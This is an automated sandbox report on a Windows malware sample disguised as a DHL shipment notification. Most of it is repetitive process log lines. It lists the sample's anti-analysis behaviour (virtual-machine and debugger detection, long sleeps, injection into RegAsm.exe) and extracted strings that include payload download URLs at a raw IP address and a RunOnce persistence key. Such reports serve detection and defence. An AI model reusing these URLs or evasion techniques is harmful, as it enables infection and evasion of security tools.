        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Driftigt\Rotacism6.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Driftigt\Rotacism6.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Driftigt\Rotacism6.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Driftigt\Rotacism6.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000006.00000002.1083825894.0000000002260000.00000004.00000001.sdmp, Rotacism6.exe, 00000016.00000002.1777653548.0000000002210000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
        Source: RegAsm.exe, 00000023.00000002.1747941860.0000000000E60000.00000004.00000001.sdmp, RegAsm.exe, 00000025.00000002.1819910008.0000000000EF0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=\ROTACISM6.EXE\DRIFTIGTSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDIGRESSIONERNES8HTTP://178.32.63.50/MOSS/NANCATA_RBKGW109.BINHTTP://178.32.63.50/BOSS/NANCATA_RBKGW109.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
        Source: Rotacism6.exe, 00000015.00000002.1706978652.0000000002210000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000006.00000002.1083825894.0000000002260000.00000004.00000001.sdmp, Rotacism6.exe, 00000015.00000002.1706978652.0000000002210000.00000004.00000001.sdmp, Rotacism6.exe, 00000016.00000002.1777653548.0000000002210000.00000004.00000001.sdmp, RegAsm.exe, 00000023.00000002.1747941860.0000000000E60000.00000004.00000001.sdmp, RegAsm.exe, 00000025.00000002.1819910008.0000000000EF0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 8324Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 8324Thread sleep time: -32250s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1540Thread sleep time: -460000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4736Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4192Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 645
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 1347
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: foregroundWindowGot 619
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information queried: ProcessInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeSystem information queried: ModuleInformation
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000006.00000002.1083825894.0000000002260000.00000004.00000001.sdmp, Rotacism6.exe, 00000016.00000002.1777653548.0000000002210000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
        Source: RegAsm.exe, 00000013.00000003.1544057330.0000000000CE1000.00000004.00000001.sdmp, RegAsm.exe, 00000023.00000002.1748549865.0000000000EDD000.00000004.00000020.sdmp, RegAsm.exe, 00000025.00000002.1821014212.0000000001151000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
        Source: RegAsm.exe, 00000013.00000003.1359852620.0000000000C98000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWPb
        Source: RegAsm.exe, 00000023.00000002.1748288538.0000000000EAB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWL
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000006.00000002.1083825894.0000000002260000.00000004.00000001.sdmp, Rotacism6.exe, 00000015.00000002.1706978652.0000000002210000.00000004.00000001.sdmp, Rotacism6.exe, 00000016.00000002.1777653548.0000000002210000.00000004.00000001.sdmp, RegAsm.exe, 00000023.00000002.1747941860.0000000000E60000.00000004.00000001.sdmp, RegAsm.exe, 00000025.00000002.1819910008.0000000000EF0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: Rotacism6.exe, 00000015.00000002.1706978652.0000000002210000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
        Source: RegAsm.exe, 00000023.00000002.1747941860.0000000000E60000.00000004.00000001.sdmp, RegAsm.exe, 00000025.00000002.1819910008.0000000000EF0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=\Rotacism6.exe\DriftigtSoftware\Microsoft\Windows\CurrentVersion\RunOnceDigressionernes8http://178.32.63.50/moss/nancata_RbkGW109.binhttp://178.32.63.50/boss/nancata_RbkGW109.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Source: RegAsm.exe, 00000023.00000002.1748549865.0000000000EDD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeThread information set: HideFromDebugger
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Driftigt\Rotacism6.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Driftigt\Rotacism6.exeThread information set: HideFromDebugger
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPort
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess queried: DebugPort
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: A00000
        Source: C:\Users\user\Driftigt\Rotacism6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: C20000
